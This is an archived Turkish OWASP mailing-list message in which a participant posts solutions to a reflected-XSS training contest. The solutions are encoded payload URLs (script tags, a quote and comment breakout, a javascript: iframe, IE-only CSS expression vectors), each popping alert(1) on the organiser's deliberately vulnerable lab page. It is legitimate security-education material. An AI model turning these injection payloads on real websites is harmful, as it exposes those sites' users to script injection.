[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

Çağdaş EMEK keramet at gmail.com
Mon Jun 15 14:04:39 EDT 2009


1) http://www.webguvenligi.org/xsstb/reflected.php?vector1=
<script>alert(1)<%2Fscript>
2) http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=
<div""><script>alert(1)<%2Fscript>

3) sadece IE7, IE6 da xss:expression(alert(1)) yazınca çalışıyor
http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=xss%3Aexpression(alert(1))&vector4=&vector5=&vector6=&vector7=

4)
http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E&vector5=&vector6=&vector7=

5)
http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=&vector5=%3Ciframe+src%3Djavascript%3Aalert(1)%3E%3C%2Fiframe%3E&vector6=&vector7=

6) Muhakkak basit bir yolu vardır ama ben bulamadım :))

7) #444;background-image: expression(alert(1)); yine IE7,IE6 da çalışıyor
http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=&vector5=&vector6=&vector7=%23444%3Bbackground-image%3A+expression(alert(1))

7'de 7 Yapmak gerekiyormu ? :P

2009/6/15 Bedirhan Urgun <bedirhanurgun at gmail.com>

> Merhaba,
> Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir
> "oyun grubu" uygulamasına http://www.webguvenligi.org/xsstb/reflected.phperişebilirsiniz.
> Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek
> xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all
> olarak asagida verdigim link gibi gonderen ilk iki kisye;
>
> 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
> 2inciye Son model araba
>
> Yok daha neler!...
>
> 1inciye OWASP Membership T-Shirt'u (L)
> 2inciye OWASP Membership DVD'si
>
> gonderecegim.
>
> Ornek; (birinci tuyo benden)
>
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E
>
>
> Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
> Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
> Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim" olmasin
>
> Proje Post'u:
> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>


-- 
Çağdaş Emek
Software Engineer
http://www.linkedin.com/in/keramet
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20090615/d6eebfe7/attachment.html 


More information about the Owasp-turkey mailing list